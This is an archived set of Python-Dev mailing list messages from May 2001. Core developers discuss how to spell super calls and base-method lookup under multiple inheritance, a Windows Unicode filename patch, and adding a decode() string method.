	            <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF013ED.8A190FE2@lemburg.com>

Here's an implementation of what I currently use to track down
the basemethod (taken from mx.Tools):

import types
_basemethod_cache = {}

def basemethod(object,method=None,

               cache=_basemethod_cache,InstanceType=types.InstanceType,
               ClassType=types.ClassType,None=None):

    """ Return the unbound method that is defined *after* method in the
        inheritance order of object with the same name as method
        (usually called base method or overridden method).

        object can be an instance, class or bound method. method, if
        given, may be a bound or unbound method. If it is not given,
        object must be bound method.

        Note: Unbound methods must be called with an instance as first
        argument.

        The function uses a cache to speed up processing. Changes done
        to the class structure after the first hit will not be noticed
        by the function.

        XXX Rewrite in C to increase performance.

    """
    if method is None:
        method = object
        object = method.im_self
    defclass = method.im_class
    name = method.__name__
    if type(object) is InstanceType:
        objclass = object.__class__
    elif type(object) is ClassType:
        objclass = object
    else:
        objclass = object.im_class

    # Check cache
    cacheentry = (defclass, name)
    basemethod = cache.get(cacheentry, None)
    if basemethod is not None:
        if not issubclass(objclass, basemethod.im_class):
            if __debug__:
                sys.stderr.write(
                    'basemethod(%s, %s): cached version (%s) mismatch: '
                    '%s !-> %s\n' %
                    (object, method, basemethod,
                     objclass, basemethod.im_class))
        else:
            return basemethod

    # Find defining class
    path = [objclass]
    while 1:
        if not path:
            raise AttributeError,method
        c = path[0]
        del path[0]
        if c.__bases__:
            # Prepend bases of the class
            path[0:0] = list(c.__bases__)
        if c is defclass:
            # Found (first occurance of) defining class in inheritance
            # graph
            break
        
    # Scan rest of path for the next occurance of a method with the
    # same name
    while 1:
        if not path:
            raise AttributeError,name
        c = path[0]
        basemethod = getattr(c, name, None)
        if basemethod is not None:
            # Found; store in cache and return
            cache[cacheentry] = basemethod
            return basemethod
        del path[0]
    raise AttributeError,'method %s' % name
    
-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May  2 16:06:39 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:06:39 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff>
Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>

/F:
> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)
IMO we still need to specify the class, and there we are:

     super(self, MyClass).foo(arg1, arg2)

Thomas


From guido at digicool.com  Wed May  2 17:11:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:11:17 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200."
             <3AF01381.592AE31B@lemburg.com> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
            <3AF01381.592AE31B@lemburg.com> 
Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > 
> > > This doesn't work in Python since Python has multiple inheritence,
> > > e.g. super in
> > >
> > > class A(B,C):
> > >       def foo(self):
> > >               super.foo()
> > >
> > > is ambiguous.
> > 
> > I'm not sure what you mean.  The search is totally well-defined: first
> > search B for a foo method, then search C.
> 
> I thought you were talking about an abstract super class which is
> how Java uses this term. 

Ah.  I didn't realize.  This would suggest that another (not yet
mentioned) suggestion would be to spell the basemethod call as

    super.foo(self)

keeping more in line with the tradition of passing self explicitly
when calling basemethods.

> Rereading some of the posts, I think you are indeed referring to
> the method which foo overrides -- this is what I call basemethod
> (since it is implemented in one of the base classes).

Aha.

> > > I'd rather suggest adding a function for finding the basemethod
> > > of a method. This is probably the most common task in this context.
> > 
> > I've never heard of the concept of basemethod, but if I may venture a
> > guess, it would be the same definition as I give above.
> 
> The basemethod can be defined as the first method of the same name
> found in the inheritence tree using the standard Python lookup 
> strategy (left-right, depth first) when continuing the lookup search
> at the node in the inheritence tree which defines the method querying
> the basemethod.

Yes, that's what I guessed.

> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrance calling the basemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?
> 
> Note that there are many ways of defining what a basemethod
> is, due to the ambiguities that are caused by multiple inheritence
> (e.g. the same base class may appear in different branches of the
> inheritence tree).

Well, the search will find one definite method, but you're right that
there may be situations where it's necessary to specify the specific
base class!

In C++ that is solved by writing B::foo() or C::foo().  Python doesn't
have "::" and instead overloads the "." operator.  Hmm, so even
introducing super doesn't completely remove the need to be able to
write C.foo to reference the unbound method foo of class C, and this
may require that my ugly rule still be needed.

AFAIK, Smalltalk has only single inheritance, and so does Java, so
there 'super' is enough.  Will we need to add a "::" operator to
Python???

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 17:19:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:19:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200."
             <3AF013ED.8A190FE2@lemburg.com> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
            <3AF013ED.8A190FE2@lemburg.com> 
Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com>

> Here's an implementation of what I currently use to track down
> the basemethod (taken from mx.Tools):

How am I supposed to use this?

I tried this:

    class B:
        def foo(self):
            print "B.foo"

    class C(B):
        def foo(self):
            print "C.foo"
            B.foo(self)
            print basemethod(self.foo) # Expect this to be B.foo

    class D(C):
        def foo(self):
            print "D.foo"
            C.foo(self)

    d = D()
    d.foo()

but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
required.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May  2 17:23:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:23:33 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 14:48:20 +1200."
             <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>

> > Except that sometimes you really do want x.__class__.__classdict__ to
> > have priority (e.g. for "guarded" attributes).
> 
> What's a "guarded" attribute?

I meant an attribute that's implemented by a pair of get and set
functions.  This is very useful; my proposed design lets you define
this more directly rather than requiring you to override __getattr__
and __setattr__.

> > But the issue of backwards compatibility is a big one here
> 
> I was thinking that, while this is still in the __future__,
> the __dict__ attribute would be a pseudo-dict that, by
> default, behaves like the union of the old __dict__ and
> the __classdict__.

Actually, I think that what's in the __dict__ is just perfect; it's
the definition of getattr(classobject, name) where name is both an
instance and a class method that causes trouble.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 16:29:20 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:29:20 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>  
	            <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com>
Message-ID: <3AF019C0.716E6D35@lemburg.com>

Guido van Rossum wrote:
> 
> > Here's an implementation of what I currently use to track down
> > the basemethod (taken from mx.Tools):
> 
> How am I supposed to use this?
> 
> I tried this:
> 
>     class B:
>         def foo(self):
>             print "B.foo"
> 
>     class C(B):
>         def foo(self):
>             print "C.foo"
>             B.foo(self)
>             print basemethod(self.foo) # Expect this to be B.foo

This finds the basemethod of self.foo meaning the method overridden
by D.foo. To get at the basemethod of C.foo, you'd have to call

basemethod(self, C.foo)

Note that the intent here is to be able to call basemethods
even in case the defining class is only mixin class -- a very
common situation at least in many of my applications (keeps
inheritance trees shallow and increases readability of the code).
 
>     class D(C):
>         def foo(self):
>             print "D.foo"
>             C.foo(self)
> 
>     d = D()
>     d.foo()
> 
> but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
> required.
> 
> --Guido van Rossum (home page: http://www.python.org/~guido/)
> 
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> http://mail.python.org/mailman/listinfo/python-dev

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Wed May  2 16:15:58 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 16:15:58 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>
Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid>

thomas wrote:

> > why not spell it out:
> > 
> >     self.__super__.foo(arg1, arg2)
> > 
> > or
> > 
> >     self.super.foo(arg1, arg2)
> > 
> > or
> > 
> >     super(self).foo(arg1, arg2)
>
> IMO we still need to specify the class, and there we are:
> 
>      super(self, MyClass).foo(arg1, arg2)

isn't that the same as self.__class__ ?  in which case
super is something like:

import new

class super:
    def __init__(self, instance):
        self.instance = instance
    def __getattr__(self, name):
        for klass in self.instance.__class__.__bases__:
            member = getattr(klass, name, None)
            if member:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

(I'm even more confused than my pythonware.com colleague)

Cheers /F


From donb at abinitio.com  Wed May  2 16:41:14 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 10:41:14 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <200105021441.KAA08444@localhost.localdomain>

Guido van Rossum <guido at digicool.com> wrote,
> [Greg Ward, welcome back!]
> >   * 'super' is a magic object that only makes sense inside a 'def'
> >     inside a 'class' (at least for now; perhaps it could be generalized
> >     to work at class scope as well as method scope, but let's keep
> >     it simple)
> 
> Yes, that's about the only way it can be made to work.  The compiler
> will have to (1) detect that 'super' is a free variable, and (2) make
> it a local and initialize it with the proper magic.  Or, to relieve
> the burden from the symbol table, we could make super a keyword, at
> the cost of breaking existing code.

I'm not at all sure I like the idea of 'super'.  It's far more magic
that I am used to (coming from Python at least).  Currently, we spell
'super' like this:

     class foo(bar):
         def __repr__(self):
             return bar.__repr__(self)  # that's super!

I like the explicit nature of it.  As Guido points out however, this
ends up being ambiguous when we try to make classes more
"instance-like".

Now, how do I like to spell super?

     class foo(bar):
         def __repr__(self):
             return bar._.__repr__(self)  # now that's really super!

or, for those who like the "keyword":

     class foo(bar):
         def __repr__(self):
             super = bar._
             return super.__repr__(self)

The trick here in the implementation of getattr on the '_'.  It return
a proxy object for the class.  When attributes are accessed through it
a different search path is taken.  This path is the same path that
would be taken by instance attribute look up.  In my code, I refer to
this object as the 'unbound instance'.  Since accessing a function
through this object will yield an unbound instance method, the name
makes sense to me.

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From thomas.heller at ion-tof.com  Wed May  2 16:49:02 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:49:02 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <075101c0d317$07516fe0$e000a8c0@thomasnotebook>

> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:
> 
> import new
> 
> class super:
>     def __init__(self, instance):
>         self.instance = instance
>     def __getattr__(self, name):
>         for klass in self.instance.__class__.__bases__:
>             member = getattr(klass, name, None)
>             if member:
>                 if callable(member):
>                     return new.instancemethod(member, self.instance, klass)
>                 return member
>         raise AttributeError(name)
> 
No, it's not the same. Consider:

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print

This prints:
test X

test Y
test X

test Y
test Y
(more test Y lines deleted)
Runtime error: maximum recursion depth exceeded

This is because super(self).test for the Z() object
should start the search in the X class, not in the Y class.


Thomas


From thomas.heller at ion-tof.com  Wed May  2 16:53:17 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:53:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <078f01c0d317$9f6a5b70$e000a8c0@thomasnotebook>

This implementation of super works correctly:

import new

class super:
    def __init__(self, instance, klass):
        self.instance = instance
        self.klass = klass
    def __getattr__(self, name):
        for klass in (self.klass,) + self.klass.__bases__:
            member = getattr(klass, name, None)
            if member:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

class X:
    def test(self):
        print "test X"

class Y(X):
    def test(self):
        print "test Y"
        super(self, X).test()

class Z(Y):
    pass
        
X().test()
print
Y().test()
print
Z().test()
print

Thomas


From donb at abinitio.com  Wed May  2 17:31:45 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 11:31:45 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105021531.LAA08940@localhost.localdomain>

Guido van Rossum <guido at digicool.com> wrote,
> AFAIK, Smalltalk has only single inheritance, and so does Java, so
> there 'super' is enough.  Will we need to add a "::" operator to
> Python???

Multiple inheritance introduces a potential wrinkle in my definition
of the unbound instance.  The problem is that search starts one level
too high.  That is in:

    class foo(b1, b2):
          def __repr__(self):
              super = b1._  #this one
              super = b2._  #or this one?
              return super.__repr__(self)

we dont know which base class to choose as the starting point for the
search.  This problem already exist.  Now, if we want to avoid it,
this:

    class foo(b1, b2):
          def __repr__(self):
              super = foo.__super__
              return super.__repr__(self)


comes to mind.

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                      ...Will hack for sushi...


From donb at abinitio.com  Wed May  2 17:37:39 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Wed, 02 May 2001 11:37:39 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid>
Message-ID: <200105021537.LAA09063@localhost.localdomain>

"Fredrik Lundh" <fredrik at effbot.org> wrote,
> thomas wrote:
> 
> > > why not spell it out:
> > > 
> > >     self.__super__.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     self.super.foo(arg1, arg2)
> > > 
> > > or
> > > 
> > >     super(self).foo(arg1, arg2)
> >
> > IMO we still need to specify the class, and there we are:
> > 
> >      super(self, MyClass).foo(arg1, arg2)
> 
> isn't that the same as self.__class__ ?  in which case
> super is something like:

super is a lexically scoped concept.  You cant ask the instance for it
since it's value is different depending on in which it is needed Just
as:

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__repr__(self)

would get you into an infinite loop, while:

        class foo(bar):
              def __repr__(self):
                  return bar.__repr__(self)

wont.  Now, dont go thinking that

        class foo(bar):
              def __repr__(self):
                  return self.__class__.__base__[0].__repr__(self)

will do you any good either ;) Because it wont!

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido at digicool.com  Wed May  2 19:02:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:02:19 -0500
Subject: [Python-Dev] Unicode and the Windows file system.
In-Reply-To: Your message of "Fri, 27 Apr 2001 00:26:39 +1000."
             <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> 
Message-ID: <200105021702.MAA01317@cj20424-a.reston1.va.home.com>

> Now that 2.1 is out the door, how do we feel about getting these Unicode
> changes in?
> 
> http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 

No problem for me, although the context-sensitive semantics of the
MBCS encoding still elude me.  (Who cares, it's Windows. :-)

Are you & MAL capable of sorting this out?  Do you want me to add a +1
comment to the tracker?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gmcm at hypernet.com  Wed May  2 18:01:20 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Wed, 2 May 2001 12:01:20 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
References: Your message of "Wed, 02 May 2001 14:48:20 +1200."             <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> 
Message-ID: <3AEFF710.9471.8025D7EA@localhost>

Hmmm.

Some time ago, Tim asked the question: "Why do you wnat 
this stuff?". As far as I can recall, he got 2 answers: "So I 
don't have to 'initialize(Klass)'" and "me, too". I don't think 
those qualify as answers.

Some time ago (cf, types-sig brouhaha of a couple years ago) 
I concluded that the only purpose for this stuff was __getattr__ 
and __setattr__ hacks. I reached this conclusion by going 
nutzo using (Guido's) metaclass hook, and studying the 
available uses of ExtensionClass (I could find no public usage 
of Don's elegant madness).

I rather liked Guido's "Turtles all the way down" (but his 
description was so cryptic that my interpretation may have 
been a hallucination), and I suspect he's still headed that way.

Nonetheless, I would like to see this discussion of the 
elegance of SmallTalk's incompatible model (and how to fudge 
it in Python) balanced by some discussion of the expected 
pragmatic benefits. (That's a different topic from subclassing 
types.)

start-with-"if-God-wanted-metaclasses-he-wouldn't-have-
invented-proxies"-<wink>-ly y'rs


- Gordon


From fredrik at effbot.org  Wed May  2 17:47:08 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 17:47:08 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>
Message-ID: <00a901c0d31f$2797a370$e46940d5@hagrid>

Donald Beaudry wrote:
> super is a lexically scoped concept.  You cant ask the instance for it
> since it's value is different depending on in which it is needed

oh, you want people to be able to inherit from classes
using super?

guess we'll have to use

        sys._getframe().f_back.f_method.im_class

instead, then ;-)

(any special reason why frame objects don't contain a
pointer to the corresponding function/method object?)

Cheers /F


From mal at lemburg.com  Wed May  2 18:11:50 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 18:11:50 +0200
Subject: [Python-Dev] Unicode and the Windows file system.
References: <LCEPIIGDJPKCOIHOBJEPIEMMDKAA.MarkH@ActiveState.com> <200105021702.MAA01317@cj20424-a.reston1.va.home.com>
Message-ID: <3AF031C6.324D25D5@lemburg.com>

Guido van Rossum wrote:
> 
> > Now that 2.1 is out the door, how do we feel about getting these Unicode
> > changes in?
> >
> > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470
> 
> No problem for me, although the context-sensitive semantics of the
> MBCS encoding still elude me.  (Who cares, it's Windows. :-)
> 
> Are you & MAL capable of sorting this out?  Do you want me to add a +1
> comment to the tracker?

I'll take care of the parser marker stuff and Mark can do the
rest ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 19:17:50 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 12:17:50 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200."
             <00a901c0d31f$2797a370$e46940d5@hagrid> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain>  
            <00a901c0d31f$2797a370$e46940d5@hagrid> 
Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com>

> (any special reason why frame objects don't contain a
> pointer to the corresponding function/method object?)

Because (until now) there was no need.  The frame needs to know about
the code object, but the rest of the function's context is not needed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 20:13:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:13:17 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
Message-ID: <3AF04E3D.45AE4F4B@lemburg.com>

We already have "data".encode(encoding) which encodes the string data
by passing it through the encoder of the given encoding.

Wouldn't it be worthwhile to add direct access to codec decoders
through string methods as well ?

(Note that this addition only makes sense for string objects,
since Unicode cannot be decoded.)

Also, would there be any objections adding some more standard
codecs to the system ? I'm thinking of wrapping the binascii 
module APIs in form of codecs...

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 21:18:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:18:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200."
             <3AF04E3D.45AE4F4B@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> 
Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com>

> We already have "data".encode(encoding) which encodes the string data
> by passing it through the encoder of the given encoding.
> 
> Wouldn't it be worthwhile to add direct access to codec decoders
> through string methods as well ?
> 
> (Note that this addition only makes sense for string objects,
> since Unicode cannot be decoded.)
> 
> Also, would there be any objections adding some more standard
> codecs to the system ? I'm thinking of wrapping the binascii 
> module APIs in form of codecs...

Can you provide examples of where this can't be done using the
existing approach?

Code-bloat police anyone?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Wed May  2 20:32:46 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 20:32:46 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
Message-ID: <3AF052CE.E928BDA1@lemburg.com>

Guido van Rossum wrote:
> 
> > We already have "data".encode(encoding) which encodes the string data
> > by passing it through the encoder of the given encoding.
> >
> > Wouldn't it be worthwhile to add direct access to codec decoders
> > through string methods as well ?
> >
> > (Note that this addition only makes sense for string objects,
> > since Unicode cannot be decoded.)
> >
> > Also, would there be any objections adding some more standard
> > codecs to the system ? I'm thinking of wrapping the binascii
> > module APIs in form of codecs...
> 
> Can you provide examples of where this can't be done using the
> existing approach?

There is no existing elegant approach except hooking up to the
codecs directly. Adding .decode() is really a matter of adding
symmetry.

Here are some example of how these two codec methods could
be used:

	xmltext = binarydata.encode('base64')
	...
	binarydata = xmltext.decode('base64')

	zzz = data.encode('gzip')
	...
	data = zzz.decode('gzip')

	jpegimage = gifimage.decode('gif').encode('jpeg')

	mp3audio = wavaudio.decode('wav').encode('mp3')

	etc.

Basically all content transfer encodings can take advantage of
these two methods.

It's not really code bloat, BTW, since the C API is there;
the .decode() method would just expose it.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Wed May  2 21:38:10 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 14:38:10 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200."
             <3AF052CE.E928BDA1@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
            <3AF052CE.E928BDA1@lemburg.com> 
Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com>

> > Can you provide examples of where this can't be done using the
> > existing approach?
> 
> There is no existing elegant approach except hooking up to the
> codecs directly. Adding .decode() is really a matter of adding
> symmetry.

Yes, but symmetry is good except when it isn't. :-)

> Here are some example of how these two codec methods could
> be used:
> 
> 	xmltext = binarydata.encode('base64')
> 	...
> 	binarydata = xmltext.decode('base64')
> 
> 	zzz = data.encode('gzip')
> 	...
> 	data = zzz.decode('gzip')
> 
> 	jpegimage = gifimage.decode('gif').encode('jpeg')
> 
> 	mp3audio = wavaudio.decode('wav').encode('mp3')
> 
> 	etc.

How would you do this currently?

> Basically all content transfer encodings can take advantage of
> these two methods.
> 
> It's not really code bloat, BTW, since the C API is there;
